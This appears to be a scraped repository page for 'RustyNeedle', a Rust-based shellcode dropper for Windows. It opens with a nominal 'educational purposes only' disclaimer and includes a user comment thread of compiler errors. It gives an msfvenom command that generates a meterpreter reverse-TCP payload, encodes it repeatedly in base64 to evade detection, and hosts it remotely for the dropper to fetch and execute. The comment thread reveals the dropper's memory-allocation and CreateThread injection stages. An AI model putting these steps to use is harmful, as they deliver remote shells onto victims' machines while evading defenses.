A Rust-based dropper for shellcode payloads.

Michael Taggart

Last update: Dec 5, 2022

Related tags

Miscellaneous rustyneedle

Overview

RustyNeedle

THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY. I take no responsibility if you decide to do crimes with this code.

A simple dropper for shellcode that leverages the power of...base64 encoding??

No seriously. And it works. Here's how:

Usage

Create your shellcode however you like, be it with msfvenom or other tools. Export the raw shellcode file.
Use the encode.py script provided in this repository to create an encoded version of the shellcode.

python3 encode.py [SHELLCODE_FILE] [B64_ITERATIONS] [OUT_FILE]

Arguments

SHELLCODE_FILE: raw shellcode file to encode
B64_ITERATIONS: # of times to base64-encode the shellcode
OUT_FILE: Resulting text file of the encoded shellcode. NOTE: this will be many times larger than the source!

Alternative usage

If you don't want to use the script, you can also encode 0x hex values from msfvenom. It would go something like this:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f csharp | tail -n+2 | sed 's/[{}; \n]//g' | base64 -w 0 > note.txt
# Pipe to base64 -w 0 as many times as you want to iterate the encoding

Edit the source code in src/main.rs to reflect the URL where the encoded shellcode will be hosted.
Run cargo build --target x86_64-pc-windows-gnu --release. If building on Linux for Windows, make sure you've added the Windows target triple with rustup target add x86_64-pc-windows-gnu.
Copy the resulting exe in target/x86_64-pc-windows-gnu/release/rustyneedle.exe wherever you like.
Set up any listeners, then execute the dropper!

You might also like...

The Voting example based on MoonZoon and Solana.

Voting example The Rust-only Voting example based on MoonZoon and Solana. MoonZoon is a Rust Fullstack Framework. Solana is a decentralized blockchain

26 Dec 8, 2022

A webhook-based Discord slash command library

Slashook A webhook-based Discord slash command library. This is a WIP project. Please note breaking changes can occur within minor releases until vers

11 Oct 18, 2022

A cell-based esoteric programming language

Tape A cell-based esoteric programming language Tape is a cell-based, brainfuck-like programming language that has a readable syntax and a non-wasted

2 Feb 23, 2022

A collection of compilers based around compiling a high level language to a Brainfuck dialect.

tf A collection of compilers based around compiling a high level language to a Brainfuck dialect. Built at, and for, the VolHacks V hackathon during O

6 Nov 25, 2021

Nimbus is a framework for building parachain consensus systems on cumulus-based parachains.

Cumulo -- Nimbus ⛈️ Nimbus is a framework for building parachain consensus systems on cumulus-based parachains. Given the regular six-second pulse-lik

36 Dec 14, 2022

Pbot - pan93412's extensible userbot, which is full-documented, enginnered and based on Actor model.

pbot pan93412's extensible user bot, which is full-documented, engineered and based on Actor model. Usage Run cargo run --release [--features modules

4 Feb 28, 2022

Single-future, #![no_std] executor based on event bitmasks

19 May 24, 2022

Cloud-Based Microservice Performance Profiling Tool

Revelio Systems Revelio Systems is a student startup sponsored by UT Austin's Inventors Program in partnership with Trend Micro. Team: Tejas Saboo, So

1 Feb 24, 2022

Parsers based on lady-deirdre project

ld-exts Parsers based on lady-deirdre project Links Lady Deirdre Alternative - Tree Sitter Config for NeoVim - LunarVim Parsers: Language Progress Hig

4 Feb 11, 2023

Comments

compile problem

Hey I'm not sure whats going on here could you help?

error: proc macro panicked
  --> src\main.rs:33:1
   |
33 | use_litcrypt!();
   | ^^^^^^^^^^^^^^^
   |
   = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
  --> src\main.rs:80:35
   |
80 |                     let err_msg = lc!("Could not convert bytes to string");
   |                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   |
   = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:103:31
    |
103 |                 let err_msg = lc!("Could not decode shellcode");
    |                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:112:20
    |
112 |         return Err(lc!("Could not download shellcode"));
    |                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:133:32
    |
133 |                 println!("{}", lc!("Couldn't allocate memory to current proc."));
    |                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:135:32
    |
135 |                 println!("{}", lc!("Allocated memory to current proc."));
    |                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:139:28
    |
139 |             println!("{}", lc!("Copying Shellcode to address in current proc."));
    |                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:141:28
    |
141 |             println!("{}", lc!("Copied..."));
    |                            ^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:144:28
    |
144 |             println!("{}", lc!("Changing mem protections to RX..."));
    |                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:156:39
    |
156 |                 return println!("{}", lc!("Error during injection"));
    |                                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:160:28
    |
160 |             println!("{}", lc!("Calling CreateThread..."));
    |                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:175:32
    |
175 |                 println!("{}", lc!("Error during inject."));
    |                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:181:31
    |
181 |                println!("{}", lc!("Good!"));
    |                               ^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

error: proc macro panicked
   --> src\main.rs:182:31
    |
182 |                println!("{}", lc!("Injection completed!"));
    |                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = help: message: LITCRYPT_ENCRYPT_KEY environment variable not set.

opened by shorefall 3